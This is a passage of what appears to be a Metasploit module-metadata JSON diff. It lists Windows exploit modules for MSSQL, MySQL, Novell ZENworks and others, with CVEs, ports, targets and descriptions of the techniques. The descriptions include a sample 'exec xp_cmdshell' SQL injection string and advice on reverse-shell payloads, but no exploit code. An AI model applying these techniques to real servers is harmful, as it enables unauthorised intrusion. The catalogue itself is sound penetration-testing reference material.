"MSSQL 2005 SP0 (9.00.1399.06)", - "MSSQL 2005 SP1 (9.00.2047.00)", - "MSSQL 2005 SP2 (9.00.3042.00)", - "CRASHER" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb", - "is_install_path": true, - "ref_name": "windows/mssql/ms09_004_sp_replwritetovarbin", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/mssql/ms09_004_sp_replwritetovarbin_sqli": { - "name": "MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection", - "fullname": "exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli", - "aliases": [], - "rank": 600, - "disclosure_date": "2008-12-09", - "type": "exploit", - "author": [ - "jduck ", - "Rodrigo Marcos" - ], - "description": "A heap-based buffer overflow can occur when calling the undocumented\n \"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects\n all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,\n and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.\n Microsoft patched this vulnerability in SP3 for 2005 without any public\n mention.\n\n This exploit smashes several pointers, as shown below.\n\n 1. pointer to a 32-bit value that is set to 0\n 2. pointer to a 32-bit value that is set to a length influenced by the buffer\n length.\n 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000,\n this value is referenced with a displacement of 0x38. For MSSQL 2005, the\n displacement is 0x10. The address of our buffer is conveniently stored in\n ecx when this instruction is executed.\n 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with\n a displacement of 4. This pointer is not used by this exploit.\n\n This particular exploit replaces the previous dual-method exploit. It uses\n a technique where the value contained in ecx becomes the stack. From there,\n return oriented programming is used to normalize the execution state and\n finally execute the payload via a \"jmp esp\". All addresses used were found\n within the sqlservr.exe memory space, yielding very reliable code execution\n using only a single query.\n\n NOTE: The MSSQL server service does not automatically restart by default. That\n said, some exceptions are caught and will not result in terminating the process.\n If the exploit crashes the service prior to hijacking the stack, it won't die.\n Otherwise, it's a goner.", - "references": [ - "OSVDB-50589", - "CVE-2008-5416", - "BID-32710", - "MSB-MS09-004", - "EDB-7501", - "URL-http://www.secforce.co.uk/blog/2011/01/exploiting-ms09-004-via-sql-injection/" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "MSSQL 2000 / MSDE SP0 (8.00.194)", - "MSSQL 2000 / MSDE SP1 (8.00.384)", - "MSSQL 2000 / MSDE SP2 (8.00.534)", - "MSSQL 2000 / MSDE SP3 (8.00.760)", - "MSSQL 2000 / MSDE SP4 (8.00.2039)", - "MSSQL 2005 SP0 (9.00.1399.06)", - "MSSQL 2005 SP1 (9.00.2047.00)", - "MSSQL 2005 SP2 (9.00.3042.00)", - "CRASHER" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb", - "is_install_path": true, - "ref_name": "windows/mssql/ms09_004_sp_replwritetovarbin_sqli", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/mssql/mssql_clr_payload": { - "name": "Microsoft SQL Server Clr Stored Procedure Payload Execution", - "fullname": "exploit/windows/mssql/mssql_clr_payload", - "aliases": [], - "rank": 600, - "disclosure_date": "1999-01-01", - "type": "exploit", - "author": [ - "Lee Christensen", - "Nathan Kirk", - "OJ Reeves" - ], - "description": "This module executes an arbitrary native payload on a Microsoft SQL\n server by loading a custom SQL CLR Assembly into the target SQL\n installation, and calling it directly with a base64-encoded payload.\n\n The module requires working credentials in order to connect directly to the\n MSSQL Server.\n\n This method requires the user to have sufficient privileges to install a custom\n SQL CRL DLL, and invoke the custom stored procedure that comes with it.\n\n This exploit does not leave any binaries on disk.\n\n Tested on MS SQL Server versions: 2005, 2012, 2016 (all x64).", - "references": [ - "URL-https://web.archive.org/web/20200810021536/http://sekirkity.com/command-execution-in-sql-server-via-fileless-clr-based-custom-stored-procedure/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2025-01-09 20:58:40 +0000", - "path": "/modules/exploits/windows/mssql/mssql_clr_payload.rb", - "is_install_path": true, - "ref_name": "windows/mssql/mssql_clr_payload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/mssql/mssql_linkcrawler": { - "name": "Microsoft SQL Server Database Link Crawling Command Execution", - "fullname": "exploit/windows/mssql/mssql_linkcrawler", - "aliases": [], - "rank": 500, - "disclosure_date": "2000-01-01", - "type": "exploit", - "author": [ - "Antti Rantasaari ", - "Scott Sutherland \"nullbind\" " - ], - "description": "This module can be used to crawl MS SQL Server database links and deploy\n Metasploit payloads through links configured with sysadmin privileges using a\n valid SQL Server Login.\n\n If you are attempting to obtain multiple reverse shells using this module we\n recommend setting the \"DisablePayloadHandler\" advanced option to \"true\", and setting\n up a exploit/multi/handler to run in the background as a job to support multiple incoming\n shells.\n\n If you are interested in deploying payloads to specific servers this module also\n supports that functionality via the \"DEPLOYLIST\" option.\n\n Currently, the module is capable of delivering payloads to both 32bit and 64bit\n Windows systems via powershell memory injection methods based on Matthew Graeber's\n work. As a result, the target server must have powershell installed. By default,\n all of the crawl information is saved to a CSV formatted log file and MSF loot so\n that the tool can also be used for auditing without deploying payloads.", - "references": [ - "URL-http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012", - "URL-http://msdn.microsoft.com/en-us/library/ms188279.aspx", - "URL-http://www.exploit-monday.com/2011_10_16_archive.html" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2024-02-19 10:57:53 +0000", - "path": "/modules/exploits/windows/mssql/mssql_linkcrawler.rb", - "is_install_path": true, - "ref_name": "windows/mssql/mssql_linkcrawler", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/mssql/mssql_payload": { - "name": "Microsoft SQL Server Payload Execution", - "fullname": "exploit/windows/mssql/mssql_payload", - "aliases": [], - "rank": 600, - "disclosure_date": "2000-05-30", - "type": "exploit", - "author": [ - "David Kennedy \"ReL1K\" ", - "jduck " - ], - "description": "This module executes an arbitrary payload on a Microsoft SQL Server by using\n the \"xp_cmdshell\" stored procedure. Currently, three delivery methods are supported.\n\n First, the original method uses Windows 'debug.com'. File size restrictions are\n avoided by incorporating the debug bypass method presented by SecureStat at\n Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems.\n\n A second method takes advantage of the Command Stager subsystem. This allows using\n various techniques, such as using a TFTP server, to send the executable. By default\n the Command Stager uses 'wcsript.exe' to generate the executable on the target.\n\n Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the\n payload on the target.\n\n NOTE: This module will leave a payload executable on the target system when the\n attack is finished.", - "references": [ - "CVE-2000-0402", - "OSVDB-557", - "BID-1281", - "CVE-2000-1209", - "OSVDB-15757", - "BID-4797" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2025-03-03 19:20:56 +0000", - "path": "/modules/exploits/windows/mssql/mssql_payload.rb", - "is_install_path": true, - "ref_name": "windows/mssql/mssql_payload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "mssql" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/mssql/mssql_payload_sqli": { - "name": "Microsoft SQL Server Payload Execution via SQL Injection", - "fullname": "exploit/windows/mssql/mssql_payload_sqli", - "aliases": [], - "rank": 600, - "disclosure_date": "2000-05-30", - "type": "exploit", - "author": [ - "David Kennedy \"ReL1K\" ", - "jduck ", - "Rodrigo Marcos" - ], - "description": "This module will execute an arbitrary payload on a Microsoft SQL\n Server, using a SQL injection vulnerability.\n\n Once a vulnerability is identified this module\n will use xp_cmdshell to upload and execute Metasploit payloads.\n It is necessary to specify the exact point where the SQL injection\n vulnerability happens. For example, given the following injection:\n\n http://www.example.com/show.asp?id=1;exec xp_cmdshell 'dir';--&cat=electrical\n\n you would need to set the following path:\n set GET_PATH /showproduct.asp?id=1;[SQLi];--&cat=foobar\n\n In regard to the payload, unless there is a closed port in the web server,\n you dont want to use any \"bind\" payload, specially on port 80, as you will\n stop reaching the vulnerable web server host. You want a \"reverse\" payload, probably to\n your port 80 or to any other outbound port allowed on the firewall.\n For privileged ports execute Metasploit msfconsole as root.\n\n Currently, three delivery methods are supported.\n\n First, the original method uses Windows 'debug.com'. File size restrictions are\n avoided by incorporating the debug bypass method presented by SecureStat at\n Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems.\n\n A second method takes advantage of the Command Stager subsystem. This allows using\n various techniques, such as using a TFTP server, to send the executable. By default\n the Command Stager uses 'wcsript.exe' to generate the executable on the target.\n\n Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the\n payload on the target.\n\n NOTE: This module will leave a payload executable on the target system when the\n attack is finished.", - "references": [ - "CVE-2000-0402", - "OSVDB-557", - "BID-1281", - "CVE-2000-1209", - "OSVDB-15757", - "BID-4797", - "URL-http://www.secforce.co.uk/blog/2011/01/penetration-testing-sql-injection-and-metasploit/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/mssql/mssql_payload_sqli.rb", - "is_install_path": true, - "ref_name": "windows/mssql/mssql_payload_sqli", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/mysql/mysql_mof": { - "name": "Oracle MySQL for Microsoft Windows MOF Execution", - "fullname": "exploit/windows/mysql/mysql_mof", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-12-01", - "type": "exploit", - "author": [ - "kingcope", - "sinn3r " - ], - "description": "This module takes advantage of a file privilege misconfiguration problem\n specifically against Windows MySQL servers (due to the use of a .mof file).\n This may result in arbitrary code execution under the context of SYSTEM.\n This module requires a valid MySQL account on the target machine.", - "references": [ - "CVE-2012-5613", - "OSVDB-88118", - "EDB-23083", - "URL-https://seclists.org/fulldisclosure/2012/Dec/13" - ], - "platform": "Windows", - "arch": "", - "rport": 3306, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "MySQL on Windows prior to Vista" - ], - "mod_time": "2024-02-28 17:18:43 +0000", - "path": "/modules/exploits/windows/mysql/mysql_mof.rb", - "is_install_path": true, - "ref_name": "windows/mysql/mysql_mof", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": [ - "mysql" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/mysql/mysql_start_up": { - "name": "Oracle MySQL for Microsoft Windows FILE Privilege Abuse", - "fullname": "exploit/windows/mysql/mysql_start_up", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-12-01", - "type": "exploit", - "author": [ - "sinn3r ", - "Sean Verity " - ], - "description": "This module takes advantage of a file privilege misconfiguration problem\n specifically against Windows MySQL servers. This module abuses the FILE\n privilege to write a payload to Microsoft's All Users Start Up directory\n which will execute every time a user logs in. The default All Users Start\n Up directory used by the module is present on Windows 7.", - "references": [ - "CVE-2012-5613", - "OSVDB-88118", - "EDB-23083", - "URL-https://seclists.org/fulldisclosure/2012/Dec/13" - ], - "platform": "Windows", - "arch": "", - "rport": 3306, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "MySQL on Windows" - ], - "mod_time": "2024-02-28 17:18:43 +0000", - "path": "/modules/exploits/windows/mysql/mysql_start_up.rb", - "is_install_path": true, - "ref_name": "windows/mysql/mysql_start_up", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": [ - "mysql" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/mysql/mysql_yassl_hello": { - "name": "MySQL yaSSL SSL Hello Message Buffer Overflow", - "fullname": "exploit/windows/mysql/mysql_yassl_hello", - "aliases": [], - "rank": 200, - "disclosure_date": "2008-01-04", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the yaSSL (1.7.5 and earlier)\n implementation bundled with MySQL <= 6.0. By sending a specially crafted\n Hello packet, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2008-0226", - "OSVDB-41195", - "BID-27140" - ], - "platform": "Windows", - "arch": "", - "rport": 3306, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "MySQL 5.0.45-community-nt", - "MySQL 5.1.22-rc-community" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/mysql/mysql_yassl_hello.rb", - "is_install_path": true, - "ref_name": "windows/mysql/mysql_yassl_hello", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/mysql/scrutinizer_upload_exec": { - "name": "Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential", - "fullname": "exploit/windows/mysql/scrutinizer_upload_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-07-27", - "type": "exploit", - "author": [ - "MC ", - "Jonathan Claudius", - "Tanya Secker", - "sinn3r " - ], - "description": "This exploits an insecure config found in Scrutinizer NetFlow & sFlow Analyzer.\n By default, the software installs a default password in MySQL, and binds the\n service to \"0.0.0.0\". This allows any remote user to login to MySQL, and then\n gain arbitrary remote code execution under the context of 'SYSTEM'. Examples\n of default credentials include: 'scrutinizer:admin', and 'scrutremote:admin'.", - "references": [ - "CVE-2012-3951", - "OSVDB-84317", - "URL-http://web.archive.org/web/20140722224651/http://secunia.com/advisories/50074/", - "URL-https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Scrutinizer NetFlow and sFlow Analyzer 9.5.2 or older" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb", - "is_install_path": true, - "ref_name": "windows/mysql/scrutinizer_upload_exec", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/nfs/xlink_nfsd": { - "name": "Omni-NFS Server Buffer Overflow", - "fullname": "exploit/windows/nfs/xlink_nfsd", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-11-06", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Xlink Omni-NFS Server 5.2\n When sending a specially crafted nfs packet, an attacker may be able\n to execute arbitrary code.", - "references": [ - "CVE-2006-5780", - "OSVDB-30224", - "BID-20941", - "URL-http://www.securityfocus.com/data/vulnerabilities/exploits/omni-nfs-server-5.2-stackoverflow.pm" - ], - "platform": "Windows", - "arch": "", - "rport": 2049, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP4 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/nfs/xlink_nfsd.rb", - "is_install_path": true, - "ref_name": "windows/nfs/xlink_nfsd", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/nimsoft/nimcontroller_bof": { - "name": "CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow", - "fullname": "exploit/windows/nimsoft/nimcontroller_bof", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-02-05", - "type": "exploit", - "author": [ - "wetw0rk" - ], - "description": "This module exploits a buffer overflow within the CA Unified Infrastructure Management nimcontroller.\n The vulnerability occurs in the robot (controller) component when sending a specially crafted directory_list\n probe.\n\n Technically speaking the target host must also be vulnerable to CVE-2020-8010 in order to reach the\n directory_list probe.", - "references": [ - "CVE-2020-8010", - "CVE-2020-8012", - "URL-https://support.broadcom.com/external/content/release-announcements/CA20200205-01-Security-Notice-for-CA-Unified-Infrastructure-Management/7832", - "PACKETSTORM-156577" - ], - "platform": "Windows", - "arch": "x64", - "rport": 48000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal (x64) - v7.80.3132" - ], - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/exploits/windows/nimsoft/nimcontroller_bof.rb", - "is_install_path": true, - "ref_name": "windows/nimsoft/nimcontroller_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/nntp/ms05_030_nntp": { - "name": "MS05-030 Microsoft Outlook Express NNTP Response Parsing Buffer Overflow", - "fullname": "exploit/windows/nntp/ms05_030_nntp", - "aliases": [], - "rank": 300, - "disclosure_date": "2005-06-14", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the news reader of Microsoft\n Outlook Express.", - "references": [ - "CVE-2005-1213", - "OSVDB-17306", - "BID-13951", - "MSB-MS05-030" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 English SP0-SP4", - "Windows XP English SP0/SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/nntp/ms05_030_nntp.rb", - "is_install_path": true, - "ref_name": "windows/nntp/ms05_030_nntp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/novell/file_reporter_fsfui_upload": { - "name": "NFR Agent FSFUI Record File Upload RCE", - "fullname": "exploit/windows/novell/file_reporter_fsfui_upload", - "aliases": [], - "rank": 500, - "disclosure_date": "2012-11-16", - "type": "exploit", - "author": [ - "juan vazquez " - ], - "description": "NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to upload\n arbitrary files via a directory traversal while handling requests to /FSF/CMD with\n FSFUI records with UICMD 130. This module has been tested successfully against NFR\n Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).", - "references": [ - "CVE-2012-4959", - "OSVDB-87573", - "URL-https://www.rapid7.com/blog/post/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959" - ], - "platform": "Windows", - "arch": "", - "rport": 3037, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb", - "is_install_path": true, - "ref_name": "windows/novell/file_reporter_fsfui_upload", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/novell/groupwisemessenger_client": { - "name": "Novell GroupWise Messenger Client Buffer Overflow", - "fullname": "exploit/windows/novell/groupwisemessenger_client", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-07-02", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Novell's GroupWise Messenger Client.\n By sending a specially crafted HTTP response, an attacker may be able to execute\n arbitrary code.", - "references": [ - "CVE-2008-2703", - "OSVDB-46041", - "BID-29602", - "URL-http://www.infobyte.com.ar/adv/ISR-17.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Novell GroupWise Messenger 2.0 Client", - "Novell GroupWise Messenger 1.0 Client" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/novell/groupwisemessenger_client.rb", - "is_install_path": true, - "ref_name": "windows/novell/groupwisemessenger_client", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/novell/netiq_pum_eval": { - "name": "NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution", - "fullname": "exploit/windows/novell/netiq_pum_eval", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-11-15", - "type": "exploit", - "author": [ - "rgod", - "juan vazquez " - ], - "description": "This module abuses a lack of authorization in the NetIQ Privileged User Manager\n service (unifid.exe) to execute arbitrary perl code. The problem exists in the\n ldapagnt module. The module has been tested successfully on NetIQ PUM 2.3.1 over\n Windows 2003 SP2, which allows to execute arbitrary code with SYSTEM privileges.", - "references": [ - "CVE-2012-5932", - "OSVDB-87334", - "BID-56539", - "EDB-22738" - ], - "platform": "Windows", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2003 SP2 / NetIQ Privileged User Manager 2.3.1" - ], - "mod_time": "2022-03-11 12:22:27 +0000", - "path": "/modules/exploits/windows/novell/netiq_pum_eval.rb", - "is_install_path": true, - "ref_name": "windows/novell/netiq_pum_eval", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/novell/nmap_stor": { - "name": "Novell NetMail NMAP STOR Buffer Overflow", - "fullname": "exploit/windows/novell/nmap_stor", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-12-23", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Novell's Netmail 3.52 NMAP STOR\n verb. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.", - "references": [ - "CVE-2006-6424", - "OSVDB-31363", - "BID-21725" - ], - "platform": "Windows", - "arch": "", - "rport": 689, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro SP4 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/novell/nmap_stor.rb", - "is_install_path": true, - "ref_name": "windows/novell/nmap_stor", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/novell/zenworks_desktop_agent": { - "name": "Novell ZENworks 6.5 Desktop/Server Management Overflow", - "fullname": "exploit/windows/novell/zenworks_desktop_agent", - "aliases": [], - "rank": 400, - "disclosure_date": "2005-05-19", - "type": "exploit", - "author": [ - "Unknown" - ], - "description": "This module exploits a heap overflow in the Novell ZENworks\n Desktop Management agent. This vulnerability was discovered\n by Alex Wheeler.", - "references": [ - "CVE-2005-1543", - "OSVDB-16698", - "BID-13678" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/novell/zenworks_desktop_agent.rb", - "is_install_path": true, - "ref_name": "windows/novell/zenworks_desktop_agent", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/novell/zenworks_preboot_op21_bof": { - "name": "Novell ZENworks Configuration Management Preboot Service 0x21 Buffer Overflow", - "fullname": "exploit/windows/novell/zenworks_preboot_op21_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-03-30", - "type": "exploit", - "author": [ - "Stephen Fewer", - "juan vazquez " - ], - "description": "This module exploits a remote buffer overflow in the ZENworks Configuration\n Management 10 SP2. The vulnerability exists in the Preboot service and can be\n triggered by sending a specially crafted packet with the opcode 0x21\n (PROXY_CMD_FTP_FILE) to port 998/TCP. The module has been successfully tested on\n Novell ZENworks Configuration Management 10 SP2 and Windows Server 2003 SP2\n (DEP bypass).", - "references": [ - "CVE-2012-2215", - "OSVDB-65361", - "BID-40486", - "ZDI-10-090", - "URL-http://www.novell.com/support/kb/doc.php?id=7005572" - ], - "platform": "Windows", - "arch": "", - "rport": 998, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb", - "is_install_path": true, - "ref_name": "windows/novell/zenworks_preboot_op21_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/novell/zenworks_preboot_op4c_bof": { - "name": "Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow", - "fullname": "exploit/windows/novell/zenworks_preboot_op4c_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-02-22", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "juan vazquez " - ], - "description": "This module exploits a remote buffer overflow in the ZENworks Configuration\n Management. The vulnerability exists in the Preboot service and can be triggered\n by sending a specially crafted packet with the opcode 0x4c\n (PROXY_CMD_PREBOOT_TASK_INFO2) to port 998/TCP. The module has been successfully\n tested on Novell ZENworks Configuration Management 10 SP2 / SP3 and Windows Server\n 2003 SP2 (DEP bypass).", - "references": [ - "CVE-2011-3176", - "OSVDB-80231", - "BID-52659", - "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=974" - ], - "platform": "Windows", - "arch": "", - "rport": 998, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Novell ZENworks Configuration Management 10 SP3 / Windows 2003 SP2", - "Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb", - "is_install_path": true, - "ref_name": "windows/novell/zenworks_preboot_op4c_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/novell/zenworks_preboot_op6_bof": { - "name": "Novell ZENworks Configuration Management Preboot Service 0x06 Buffer Overflow", - "fullname": "exploit/windows/novell/zenworks_preboot_op6_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-03-30", - "type": "exploit", - "author": [ - "Stephen Fewer", - "juan vazquez " - ], - "description": "This module exploits a remote buffer overflow in the ZENworks Configuration\n Management 10 SP2. The vulnerability exists in the Preboot service and can be\n triggered by sending a specially crafted packet with the opcode 0x06\n (PROXY_CMD_CLEAR_WS) to the 998/TCP port. The module has been successfully tested\n on Novell ZENworks Configuration Management 10 SP2 and Windows Server 2003 SP2\n (DEP bypass).", - "references": [ - "OSVDB-65361", - "BID-40486", - "ZDI-10-090", - "URL-http://www.novell.com/support/kb/doc.php?id=7005572" - ], - "platform": "Windows", - "arch": "", - "rport": 998, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb", - "is_install_path": true, - "ref_name": "windows/novell/zenworks_preboot_op6_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/novell/zenworks_preboot_op6c_bof": { - "name": "Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow", - "fullname": "exploit/windows/novell/zenworks_preboot_op6c_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-02-22", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "juan vazquez " - ], - "description": "This module exploits a remote buffer overflow in the ZENworks Configuration\n Management. The vulnerability exists in the Preboot service and can be triggered by\n sending a specially crafted packet with the opcode 0x6c (PROXY_CMD_GET_NEXT_STEP)\n to port 998/TCP. The module has been successfully tested on Novell ZENworks\n Configuration Management 10 SP2 / SP3 and Windows Server 2003 SP2 (DEP bypass).", - "references": [ - "CVE-2011-3175", - "OSVDB-80231", - "BID-52659", - "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=973" - ], - "platform": "Windows", - "arch": "", - "rport": 998, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Novell ZENworks Configuration Management 10 SP3 / Windows 2003 SP2", - "Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb", - "is_install_path": true, - "ref_name": "windows/novell/zenworks_preboot_op6c_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": 